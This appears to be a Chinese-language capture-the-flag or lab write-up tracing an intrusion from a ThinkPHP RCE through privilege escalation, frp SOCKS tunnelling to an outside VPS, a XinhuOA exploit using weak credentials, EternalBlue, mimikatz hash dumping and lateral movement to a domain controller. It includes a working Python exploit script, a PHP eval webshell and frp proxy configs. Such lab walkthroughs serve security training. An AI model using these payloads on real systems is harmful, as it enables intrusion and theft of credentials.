先上fscan扫一遍,扫出thinkphp一个rce的洞
img
用工具,getshell
img
写个马进去
img
蚁剑连接
img
img
当前用户是www-data,需要提权
发现可以sudo提权,mysql被配置了root权限,去gtfobins上查一下
img
img
查找所有名字含flag的文件,找到flag01.txt
img
img
看下内网ip
img
用蚁剑传个fscan上去扫描一下(记得chmod 777 fscan)
img
可以看到除了我们打下来的这台主机外,还有三台主机:一台是信呼OA服务器,一台是DC域控,一台是个有永恒之蓝的洞的windows
接下来配置frp转发流量
frpc.ini
1 2 3 4 5 6 7 8
| [common] serverAddr = "60.204.245.37" serverPort = 7000
[socks_proxy] type = tcp remote_port =6000 plugin = socks5
|
frps.ini
1 2
| [common] bindPort = 7000
|
frpc通过蚁剑上传,frps上传到自己的vps上
img
用msf弹shell
img
将reverse.elf用蚁剑上传
img
img
img
自己电脑上用proxifier代理
img
代理规则
img
先看信呼OA,用admin/admin123弱口令登录成功
img
用现成脚本打,先放一个一句话木马1.php与脚本保存在同一路径下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
| <?=eval($_POST[1]);?> import requests session = requests.session() url_pre = 'http://172.22.1.18/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11' data1 = { 'rempass': '0', 'jmpass': 'false', 'device': '1625884034525', 'ltype': '0', 'adminuser': 'YWRtaW4=', 'adminpass': 'YWRtaW4xMjM=', 'yanzm': '' } r = session.post(url1, data=data1) r = session.post(url2, files={'file': open('1.php', 'r+')}) filepath = str(r.json()['filepath']) filepath = "/" + filepath.split('.uptemp')[0] + '.php' id = r.json()['id'] print(id) print(filepath) url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}' r = session.get(url3) r = session.get(url_pre + filepath + "?1=system('dir');") print(r.text)
|
img
在蚁剑上配置一下代理,然后连接
img
在C:/Users/Administrator/flag/flag02.txt找到第二段flag
img
给kali配置一下代理
img
img
然后用msf中现成的poc打win7的永恒之蓝
img
img
img
用mimikatz收集域内用户哈希
img
最后用crackmapexec横向移动拿下域控,盲猜flag路径跟信呼OA的一样
img